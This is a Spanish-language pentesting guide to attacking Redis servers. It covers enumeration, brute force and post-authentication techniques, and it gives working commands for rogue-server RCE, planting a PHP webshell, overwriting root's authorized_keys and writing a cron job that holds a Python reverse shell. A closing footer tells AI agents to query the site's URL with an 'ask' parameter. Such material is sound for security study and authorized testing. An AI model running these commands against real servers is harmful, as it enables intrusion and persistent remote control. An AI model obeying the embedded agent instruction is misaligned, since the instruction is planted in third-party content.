# Redis > Es utilizado por millones de desarrolladores como base de datos, caché, motor de streaming y agente de mensajes. ## Laboratorio Para poder realizar pruebas contra un entorno de redis de forma fácil, se puede utilizar un contenedor de docker: ```bash sudo docker run -d --name redis -p 6379:6379 redis ``` La herramienta que utilizaremos para conectarnos "redis-cli" se encuentra en el paquete de "redis-tools": ```bash sudo apt install redis-tools -y ``` Conexión al redis: ```bash redis-cli -h 127.0.0.1 ``` Conexión al contenedor de docker: ```bash sudo docker exec -it redis sh ``` Para la explotación de múltiples vulnerabilidades, es necesario que existan varios elementos comunes en entorno de producción. Para ello, dentro del contenedor se ejecutarán los siguientes comandos: ```bash mkdir -p /root/.ssh ``` ## Enumeración Se puede comprobar de diferentes formas si un servidor cuenta con el puerto 6379 abierto y si en este está siendo ejecutado el servicio de Redis. * Nmap: ```bash IP=192.168.1.222 sudo nmap --script=redis-info -sV -p 6379 $IP ``` * Telnet: ```bash IP=192.168.1.222 telnet $IP 6379 ``` * Netcat:

IP=192.168.1.222
nc -vn $IP 6379

* Redis-cli: ```bash IP=192.168.1.222 redis-cli -h $IP -p 6379 ``` * Metasploit: ```bash use auxiliary/scanner/redis/redis_server set RHOSTS 192.168.1.222 ``` Si el servidor no cuenta con autenticación, se podrán ejecutar múltiples comandos con el objetivo de enumerar información del servidor, e incluso, llegar a obtener ejecución de código en el servidor. ### Conexión ```bash IP=192.168.1.222 PORT=6379 PASS= redis-cli -h $IP -p $PORT redis-cli -h $IP -p $PORT -a $PASS ``` ### Autenticación **Por defecto, Redis no cuenta con autenticación**, esta puede (y debe) ser establecida posteriormente, bien con autenticación: * usuario+contraseña. * Solo contraseña. En el este caso, el usuario por defecto será `default`. Para autenticarse en redis, se puede utilizar el siguiente comando: ```bash AUTH ``` ### Comandos de redis Algunos comandos comunes para enumerar información del servidor: ```bash INFO client list CONFIG GET * ``` Crear una clave-valor y obtener el valor de una clave: ```bash keys * set get type ``` Para una mejor comprensión de los comandos, será mejor consultar la documentación: * ### Rutas interesantes ```bash /var/www/html /home/redis/.ssh /root/.ssh /var/lib/redis/.ssh /var/spool/cron/crontabs /var/spool/cron ``` ## Ataques sin autenticación Para conseguir ejecución de código remoto en un servidor redis, primero se deberá conseguir acceso al servicio. * [ ] Acceso directo como `anonymous`. \[[Aquí](#conexion)] * [ ] Ataque de fuerza bruta. \[[Aquí](#fuerza-bruta)] * [ ] Obtención de credenciales en otros servicios/aplicaciones. * [ ] Vía MitM. * [ ] ... ### Conexión directa Bien porque no cuenta con credenciales, o porque se han obtenido credenciales por otros medios. Más info aquí -> \[[Aquí](#conexion)] ### Fuerza bruta * nmap: ```bash sudo nmap --script redis-brute -p 6379 $IP ``` * metasploit: ```bash use auxiliary/scanner/redis/redis_login set RHOSTS ```

Comando	Descripción
info	Muestra los información y datos del servidor.
select <n>	Selecciona una base de datos que utilizar. Por defecto, Redis tiene 16 bases de datos disponibles (0 - 15), siendo 0 la utilizada normalmente.
keys <pattern>	Muestra todas las claves que coincidan con la expresión regular indicada.
type <clave>	Muestra el tipo del valor almacenado en la clave.
get <clave>	Muestra la clave
hgetall <clave>	Muestra todos los pares campo/valor almacenados en la clave hash.
hget <campo> <valor>	Obtener el valor del campo especificado en la clave hash.

## Ataques con autenticación * [ ] Redis (<=5.X) RCE. \[[Aquí](#redis-less-than-5.x-rce)] * [ ] Subir una webshell. \[[Aquí](#webshell)] * [ ] Añadir una clave ssh al servidor. \[[Aquí](#ssh)] * [ ] Añadir un crontab. \[[Aquí](#crontab)] ### Redis (<=5.X) RCE Para ello, se pueden utilizar las herramientas: * rogue-server: ```bash IP= ATIP= python3 redis-rogue-server.py --rhost=$IP --rport=$PORT --lhost $ATPI ``` * metasploit: ```bash use exploit/linux/redis/redis_replication_cmd_exec set RHOSTS ``` ### Webshell Si el mismo servidor aloja una aplicación web, se podrá intentar subir una *webshell.* Algunas rutas comunes son: [Reconocimiento](/pentesting-en-aplicaciones-web/general/reconocimiento.md#alojamiento-de-la-aplicacion-web) ```bash config set dir /var/www/html/ config set dbfilename shell.php set test "" save ``` Se pueden consultar otras opciones de webshells en: [Webshell](/pentesting-en-aplicaciones-web/general/explotacion/webshell.md#php) ```bash curl http:///shell.php?cmd=whoami ``` ### SSH #### Sobreescribe el fichero authorized\_keys 1. Manual. 2. Automatizado. **Método 1 - Manual** Este método sobreescribe el fichero de authorized\_keys, por lo que, no debería utilizarse en entornos de producción. 1. Se crea una clave privada y pública: ```bash ssh-keygen -t rsa ``` 2. Crear un fichero con la clave pública creada: ```bash (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > public_key.txt ``` 3. Copiar la clave pública en el servidor de redis: ```bash IP= cat public_key.txt | redis-cli -h $IP -x set ssh_key ``` 4. Almacenar la clave pública en el fichero `authorized_keys`.

redis-cli -h 192.168.1.222 config set dir /root/.ssh
redis-cli -h 192.168.1.222 config set dbfilename "authorized_keys"
redis-cli -h 192.168.1.222 save

5. Acceder vía SSH con la clave privada: ```bash ssh -i id_rsa redis@192.168.1.222 ``` **Método 2 - Automatizado** Se puede realizar de forma automatizada con la herramienta: * ### Crontab Primero, dejaremos el puerto de recepción a la escucha: ```bash sudo rlwrap nc -lnvp 80 ``` Este comando contiene un crontab que al ejecutarse devuelve una reverse shell con python. Habrá que modificar la IP y puerto de recepción (como siempre, preferiblemente los puertos 80 y 443): ```bash echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n" ``` Añadir el comando anterior, previamente modificados y ejecutarlo para añadir el valor en la clave "1" que se creará en redis: ```bash | redis-cli -h $IP -x set 1 ``` Se crea el fichero que, al llegar a ejecutarse, nos devolverá la shell: ```bash redis-cli -h 192.168.1.222 config set dir /var/spool/cron/crontabs/ redis-cli -h 192.168.1.222 config set dbfilename root redis-cli -h 192.168.1.222 save ``` ## Referencias * * * * * * * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.xtormin.com/pentesting-en-infraestructuras/servicios/redis.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.